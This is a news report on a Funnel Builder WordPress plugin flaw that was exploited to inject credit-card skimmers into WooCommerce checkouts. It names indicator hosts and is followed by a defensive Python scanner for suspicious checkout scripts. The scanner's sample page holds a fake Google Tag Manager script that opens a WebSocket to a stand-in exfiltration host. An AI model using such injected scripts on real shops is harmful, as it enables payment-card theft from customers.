
Funnel Builder WordPress plugin bug exploited to steal credit cards

  • General

A serious vulnerability in the WordPress Funnel Builder plugin is currently being exploited in the wild to inject malicious JavaScript into WooCommerce checkout pages. The flaw has no official CVE ID, can be exploited without authentication, and affects all versions of the plugin prior to 3.15.

**Funnel Builder** is a WordPress plugin for WooCommerce created by FunnelKit. It is mainly used to customize checkout pages and includes features such as one-click upsells, dedicated landing pages, and conversion-rate tools. According to WordPress.org statistics, the plugin is active on more than 40,000 websites.

E-commerce security firm Sansec identified the malicious activity and observed the payload being served from analytics-reports[.]com/wss/jquery-lib. The JavaScript is disguised as a fake Google Tag Manager or Google Analytics script and opens a WebSocket connection to an external server (wss://protect-wss[.])

An attacker exploits the flaw by modifying the plugin's global settings through an unprotected, publicly accessible checkout endpoint. This allows arbitrary JavaScript to be written into the plugin's "External Scripts" setting, after which the malicious code runs on every checkout page. Site owners should update to version 3.15 or later and review that setting for entries they did not add themselves.

According to Sansec, the attacker-controlled server serves a tailored payment card skimmer that exfiltrates the following data:

  • Credit card details
  • CVV codes
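The report above gives two concrete things a defender can look for on a checkout page: a script loaded from the reported indicator host, and a Google Tag Manager/Analytics lookalike that opens a WebSocket to a host the shop has no business talking to. The following scanner is an added example written for this page, not code from Sansec, FunnelKit or BleepingComputer. It parses a checkout page's `<script>` tags with the standard library only and flags three conditions: a script source on the indicator host from the report, a script whose path imitates Google tag loaders but is served from a non-Google host, and any inline script that opens a `wss://` or `ws://` connection to a host outside an allowlist. The sample HTML, the allowlist (empty by default) and the WebSocket host `evil.example` are constructed for the example; the only indicator taken from the page is `analytics-reports[.]com/wss/jquery-lib`.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts Google actually serves its tag loaders from. A "GTM" script from anywhere else is suspect.
GOOGLE_TAG_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# Indicator from the Sansec finding quoted on this page, with the defanging brackets removed.
KNOWN_BAD_HOSTS = {"analytics-reports.com"}

# WebSocket endpoints the checkout is allowed to contact. Empty is a deliberate assumption:
# a stock WooCommerce checkout does not open WebSockets, so any wss:// target is worth a look.
ALLOWED_WS_HOSTS: set = set()

# Paths that look like Google tag loaders (gtm.js, gtag/js, analytics.js).
GOOGLE_TAG_PATH_RE = re.compile(r"(gtm\.js|gtag|analytics\.js)", re.I)
# ws:// or wss:// URLs inside inline script bodies.
WS_URL_RE = re.compile(r"wss?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of src= attributes, in document order
        self.inline = []     # bodies of <script> tags without src=
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def _host_of(src):
    # Protocol-relative "//host/path" gets a scheme so urlparse sees the host;
    # a site-relative "/path" yields no host and is treated as same-origin.
    url = src if "://" in src else "https:" + src
    return (urlparse(url).hostname or "").lower()


def scan_checkout_html(html):
    """Return a list of (finding_kind, detail) tuples for suspicious scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []

    for src in collector.external:
        host = _host_of(src)
        if not host:
            continue  # same-origin asset such as /wp-content/...
        if host in KNOWN_BAD_HOSTS:
            findings.append(("known_bad_host", src))
        elif GOOGLE_TAG_PATH_RE.search(urlparse(src if "://" in src else "https:" + src).path) \
                and host not in GOOGLE_TAG_HOSTS:
            findings.append(("google_tag_lookalike", src))

    for body in collector.inline:
        for ws_host in WS_URL_RE.findall(body):
            if ws_host.lower() not in ALLOWED_WS_HOSTS:
                findings.append(("websocket_to_unlisted_host", ws_host.lower()))

    return findings


# Constructed sample of a checkout page: one legitimate GTM loader, one same-origin
# WooCommerce script, the reported indicator, a lookalike from a third-party CDN and a
# fake "Google Tag Manager" inline block that opens a WebSocket to a made-up host.
SAMPLE_HTML = """
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXX"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://analytics-reports.com/wss/jquery-lib"></script>
<script src="https://cdn.example.net/gtag/js?id=G-123456"></script>
<script>
// Google Tag Manager
var ws = new WebSocket("wss://evil.example/collect");
</script>
"""

if __name__ == "__main__":
    for kind, detail in scan_checkout_html(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it against a saved copy of the checkout page (the HTML as served to a customer, after any caching layer). Expect findings only for the indicator host, the CDN lookalike and the inline WebSocket; the real Google loader and the same-origin WooCommerce script are not reported. The allowlist is intentionally empty because the page describes no legitimate WebSocket use on a checkout; add hosts there only after confirming what they are.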

  BleepingComputer
